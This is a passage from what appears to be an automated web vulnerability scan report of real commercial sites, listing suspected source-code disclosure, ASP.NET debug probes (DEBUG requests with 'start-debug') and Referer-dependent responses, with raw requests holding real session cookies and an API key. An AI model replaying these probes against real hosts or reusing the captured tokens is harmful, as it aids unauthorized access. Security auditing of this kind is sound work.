<H;E++){G.call(F,E)}};C.mixin=function(E){d(C.functions(E),function(F){q(F,C[F]=E[F])})};var k=0;C.uniqueId=function(E){var F=k++;return E?E+F:F};C.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};C.template=function(H,G){var I=C.templateSettings;var E="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+H.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(I.
...[SNIP]...

15.4. http://reviews.gillettevenus.com/module/4746/cmn/4746/display.pkg.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://reviews.gillettevenus.com
Path:	/module/4746/cmn/4746/display.pkg.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /module/4746/cmn/4746/display.pkg.js HTTP/1.1
Host: reviews.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.1.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 06 Sep 2011 12:07:07 GMT
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Content-Length: 109248
Cache-Control: max-age=528
Expires: Tue, 06 Sep 2011 16:54:22 GMT
Date: Tue, 06 Sep 2011 16:45:34 GMT
Connection: close

$BV.Internal.define("jquery.effects.core",[document],["jquery.core"],function(a,b){
/*
* jQuery UI Effects 1.8.6
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under t
...[SNIP]...
<H;E++){G.call(F,E)}};C.mixin=function(E){d(C.functions(E),function(F){q(F,C[F]=E[F])})};var k=0;C.uniqueId=function(E){var F=k++;return E?E+F:F};C.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};C.template=function(H,G){var I=C.templateSettings;var E="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+H.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(I.
...[SNIP]...

15.5. http://search.oracle.com/search/search previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://search.oracle.com
Path:	/search/search

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

Response

15.6. http://www.cvs.com/CVSApp/js/functions.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.cvs.com
Path:	/CVSApp/js/functions.js

Issue detail

The application appears to disclose some server-side source code written in JSP.

Request

GET /CVSApp/js/functions.js HTTP/1.1
Host: www.cvs.com
Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:42 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 09:53:16 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:45:42 GMT
Vary: Accept-Encoding
Content-Length: 88173
Content-Type: application/javascript

/* ---------------------------------------------------
Global variables:

Values set to variables used by other functions
afterwards.
---------------------------------------------
...[SNIP]...
<%@include file="../path/to/include.jsp"%>
...[SNIP]...

15.7. https://www.cvs.com/CVSApp/js/functions.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www.cvs.com
Path:	/CVSApp/js/functions.js

Issue detail

The application appears to disclose some server-side source code written in JSP.

Request

GET /CVSApp/js/functions.js HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: https://www.cvs.com/CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362832
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345643244:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:30 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 09:53:16 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:30 GMT
Vary: Accept-Encoding
Content-Length: 88173
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* ---------------------------------------------------
Global variables:

Values set to variables used by other functions
afterwards.
---------------------------------------------
...[SNIP]...
<%@include file="../path/to/include.jsp"%>
...[SNIP]...

15.8. https://www.cvs.com/CVSApp/js/userprofile.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://www.cvs.com
Path:	/CVSApp/js/userprofile.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /CVSApp/js/userprofile.js HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: https://www.cvs.com/CVSApp/user/forgot_password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345673339:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:48:00 GMT
Server: Apache
Last-Modified: Tue, 30 Jun 2009 05:01:50 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:48:00 GMT
Vary: Accept-Encoding
Content-Length: 6957
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function openRemoveCardPopup(cardKey) {
window.name="BillingInfo";
var dialogUrl = "myacc_dialog_confirm_creditcard_removal.jsp?cardKey="+cardKey;
if (window.showModalDi
...[SNIP]...
ocument.add.newNickname.value == "e.g., Work, Home")
document.add.newNickname.value = "";
}
document.add.submit();
}

function openMilitaryLink(){
window.open("<%=request.getContextPath()%>/user/military_address_window.jsp");
}

function formSubmit() {
document.getElementById("hidsubmit").focus=false;
document.getElementById("hidsubmit").click();
if (window.showModalD
...[SNIP]...

15.9. http://www.dove.us/Resources/JS/dove.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.dove.us
Path:	/Resources/JS/dove.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Resources/JS/dove.js HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5jfk3byymtjxyinfzvf23uyi

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Jul 2011 03:53:46 GMT
Accept-Ranges: bytes
ETag: "0c1dcc8104ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 21499
Date: Tue, 06 Sep 2011 16:45:43 GMT
Connection: close

var dove, mightLikeCarouselwrapCounter = 0;
if (!dove) {
   dove = {};
}
dove.log = function (message, type) {
   type = type || "info";
   if (typeof console !== "undefined" && dove.global.debug) {

...[SNIP]...

$(".instantWinError").html('You forgot to fill in the field(s) denoted in red.').show();
$(".instantWinChkError").html("").hide();
// $('#<%=txtInstantWinEmail.ClientID %>').addClass("test");
$('.inst-winFields').addClass('inst-winInvalid');

}
else if (value.match(pattern) == null) {

$(".instantWinChkError").html("").hide();
$(".instantWinError").html('Please enter valid e-mail address.').show();
//$('#<%=txtInstantWinEmail.ClientID %>').addClass("test");
$('.inst-winFields').addClass('inst-winInvalid');
}
else {
$(".instantWinError").html("").hide()

...[SNIP]...

15.10. http://www.netsuite.com/portal/javascript/NLPortal.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.netsuite.com
Path:	/portal/javascript/NLPortal.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /portal/javascript/NLPortal.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 51165
Content-Disposition: inline;filename*=utf-8''NLPortal.js
NS_RTIMER_COMPOSITE: -2134941949:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: max-age=1523
Date: Tue, 06 Sep 2011 15:32:14 GMT
Connection: close
Vary: Accept-Encoding

function getBaseDomain()
{
var domain = document.domain;
var ifirst= domain.indexOf(".");
domain=domain.substring(ifirst+1);
return domain;
}

// for netcrm the appdomain is netsuite
...[SNIP]...
&& partner.length > -1)
{
var vCookieVals = partner.split(",");
partner = vCookieVals[1];
//document.cookie = "visitorCookie; path=/portal/; domain="www.<%=NLConfig.getSystemDomain()%>"; expires=Fri, 02-Jan-1970 00:00:00";
// setCookie("visitorCookie", null, null, , "www.<%=NLConfig.getSystemDomain()%>", secure)
if(partner != null && partner != "")
setCookie("partner", partner, "/", null, getBaseDomain(), null)
}
}

//return null if no partner code exi
...[SNIP]...

16. ASP.NET debugging enabled previous next
There are 3 instances of this issue:

http://services.plymedia.com/Default.aspx
http://www.oraclecfo.com/Default.aspx
http://www.znode.com/Default.aspx

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

16.1. http://services.plymedia.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://services.plymedia.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: services.plymedia.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 06 Sep 2011 16:13:00 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.2. http://www.oraclecfo.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oraclecfo.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.oraclecfo.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 06 Sep 2011 16:10:51 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.3. http://www.znode.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.znode.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.znode.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 06 Sep 2011 15:32:06 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

17. Referer-dependent response previous next
There are 10 instances of this issue:

http://a.tribalfusion.com/j.ad
http://api.bizographics.com/v1/profile.json
http://c.brightcove.com/services/viewer/federated_f9
https://login.oracle.com/mysso/signon.jsp
http://use.typekit.com/k/ghj6ovz-d.css
http://www.facebook.com/plugins/like.php
http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
http://www.harbottle.com/hnl/pages/articles/direct_beauty_products_trimsole.php
http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
http://www.youtube.com/v/JWMKXb1Guq4

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

17.1. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.tribalfusion.com
Path:	/j.ad

Request 1

GET /j.ad?site=targus&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=0x0&flashVer=10&ver=1.21&center=1&z=&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1315339138505%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F15838394&f=2&p=19083180&a=1&c9_tg=&c9_ty=&c9_s=000&rnd=19088543 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://cdn5.tribalfusion.com/media/1956006/frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response 1

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 303
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:12 GMT;
Content-Type: application/x-javascript
Content-Encoding:
Content-Length: 0
Expires: 0
Connection: keep-alive

Request 2

GET /j.ad?site=targus&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=0x0&flashVer=10&ver=1.21&center=1&z=&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1315339138505%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F15838394&f=2&p=19083180&a=1&c9_tg=&c9_ty=&c9_s=000&rnd=19088543 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response 2

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 303
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: application/x-javascript
Content-Encoding:
Content-Length: 0
Expires: 0
Connection: keep-alive

17.2. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Request 1

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 06 Sep 2011 15:32:50 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 163
Connection: keep-alive

_bizo_callback({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

Request 2

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:05 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 21
Connection: keep-alive

Unknown Referer: null

17.3. http://c.brightcove.com/services/viewer/federated_f9 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://c.brightcove.com
Path:	/services/viewer/federated_f9

Request 1

GET /services/viewer/federated_f9?isVid=1 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 17:30:56 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?purl=http%3A%2F%2Fblogs.oracle.com%2Fotn%2F&isVid=1
Content-Length: 0
Date: Tue, 06 Sep 2011 16:12:54 GMT
Server:

Request 2

GET /services/viewer/federated_f9?isVid=1 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 17:30:56 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?isVid=1
Content-Length: 0
Date: Tue, 06 Sep 2011 16:13:07 GMT
Server:

17.4. https://login.oracle.com/mysso/signon.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://login.oracle.com
Path:	/mysso/signon.jsp

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 06 Sep 2011 16:14:14 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-ORACLE-DMS-ECID: 0000J8zXBRM6uHK6EVADUS1EHWFB01t_bQ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/
Content-Length: 14934

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html
...[SNIP]...
<a href=" https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357
" class="SignupLink">Sign Up</a> for a free Oracle Web account
</div>
<div class="HelpInst"><a href=" http://www.oracle.com/us/corporate/contact/manage-your-account-070504.html
" class="HelpInstlink"> Need Help?
</a></div>
</div>
</div>
<div class="gb-b"><span class="gb-b-l"></span><span class="gb-b-r"></span></div>
</div>
<div class="pwrdbytxt"> Powered by Oracle Access Manager 11g
</div>
</div>
<div class="footer-info"><div> This site is intended solely for use by Oracle's authorized users. Use of this site is subject to the Legal Notices, Terms for Use and Privacy Statement located on this site. Use of the site by customers and partners, if authorized, is also subject to the terms of your contract(s) with Oracle. Use of this site by Oracle employees is also subject to company policies, including the Code of Conduct. Unauthorized access or breach of these terms may result in termination of your authorization to use this site and/or civil and criminal penalties.
</div></div>
</div>
</div>
<div class="t-b">
<span class="tb-l-corner"></span>
<span class="tb-r-corner"></span>
</div>
</div>
<div>
<div class="footer-content">
<a href=" http://www.oracle.com/us/corporate/index.html
" class="footer-tagline"> Hardware and Software. Engineered to work together
</a>
</div>
<div class="footer-legalnote-container">
<span class="legalese"> <a href=" ht
...[SNIP]...

Request 2

POST /mysso/signon.jsp HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Content-Length: 2822
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; 